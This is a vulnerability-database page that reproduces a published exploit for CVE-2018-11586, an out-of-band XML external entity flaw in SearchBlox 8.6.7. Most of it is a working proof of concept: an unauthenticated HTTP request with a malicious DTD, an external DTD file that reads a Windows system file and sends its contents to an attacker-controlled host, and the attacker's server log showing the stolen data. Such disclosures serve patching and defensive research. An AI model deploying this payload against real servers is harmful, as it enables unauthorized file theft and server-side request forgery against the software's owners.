Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormCanberk BOLATPACKETSTORM:148032
HistoryJun 04, 2018 - 12:00 a.m.

SearchBlox 8.6.7 XML External Entity Injection

2018-06-0400:00:00
Canberk BOLAT
packetstormsecurity.com
24

0.024 Low

EPSS

Percentile

90.0%

JSON
`# Exploit Title: SearchBlox 8.6.7 Out-Of-Band XML eXternal Entity (OOB-XXE)  
# Exploit Author: Ahmet GUREL, Canberk BOLAT  
# Software Link: https://www.searchblox.com/  
# Version: < = SearchBlox Version 8.6.7  
# Platform: Java  
# Tested on: Windows  
# CVE: CVE-2018-11586  
  
# 1. DETAILS  
  
An XML External Entity attack is a type of attack against an  
application that parses XML input. This attack occurs when XML input  
containing a reference to an external entity is processed by a weakly  
configured XML parser. This attack may lead to the disclosure of  
confidential data, denial of service, server side request forgery,  
port scanning from the perspective of the machine where the parser is  
located, and other system impacts. Reference:  
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing  
  
# 2. PoC:  
  
XML external entity (XXE) vulnerability in /searchblox/api/rest/status in  
SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary  
files or conduct server-side request forgery (SSRF) attacks via a crafted  
DTD in an XML request.  
  
HTTP Request:  
_____________  
  
GET /searchblox/api/rest/status HTTP/1.1  
Host: localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101  
Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Cookie: JSESSIONID=n9uolja8nwkj15nsv66xjlzci;  
XSRF-TOKEN=6098a021-0e3c-409f-9da0-b895eff3025d; AdsOnPage=5;  
AdsOnSearchPage=5  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Length: 140  
  
<?xml version="1.0" encoding="UTF-8" ?>  
<!DOCTYPE xxe [  
<!ENTITY % dtd SYSTEM "http://192.168.1.2:7000/ext.dtd">  
%dtd;  
%all;  
%send;]>  
  
#Ext.dtd File :  
_______________  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!ENTITY % file SYSTEM "file:///C:/windows/win.ini">  
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.1.2:7000/?%file;  
'>">  
%all;  
  
#HTTP Response:  
_______________  
  
Ahmets-MacBook-Pro:Desktop ahmet$ python -m SimpleHTTPServer 7000  
Serving HTTP on 0.0.0.0 port 7000 ...  
192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /ext.dtd HTTP/1.1" 200 -  
192.168.1.2 - - [03/Jun/2018 15:37:16] "GET  
/?;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files]%20[Mail]%20MAPI=1  
HTTP/1.1" 200 -  
  
  
`

Related

cve 1
cvelist 1
prion 1
nvd 1
zdt 1
exploitpack 1
exploitdb 1
cve
cve
CVE-2018-11586
2018-06-05 21:29:00
cvelist
cvelist
CVE-2018-11586
2018-06-05 21:00:00
prion
prion
Server side request forgery (ssrf)
2018-06-05 21:29:00
nvd
nvd
CVE-2018-11586
2018-06-05 21:29:00
zdt
zdt
SearchBlox 8.6.7 - XML External Entity Injection Vulnerability
2018-06-04 00:00:00
exploitpack
exploitpack
SearchBlox 8.6.7 - XML External Entity Injection
2018-06-04 00:00:00
exploitdb
exploitdb
SearchBlox 8.6.7 - XML External Entity Injection
2018-06-04 00:00:00

0.024 Low

EPSS

Percentile

90.0%

JSON
Related for PACKETSTORM:148032
cve1cvelist1prion1nvd1zdt1exploitpack1exploitdb1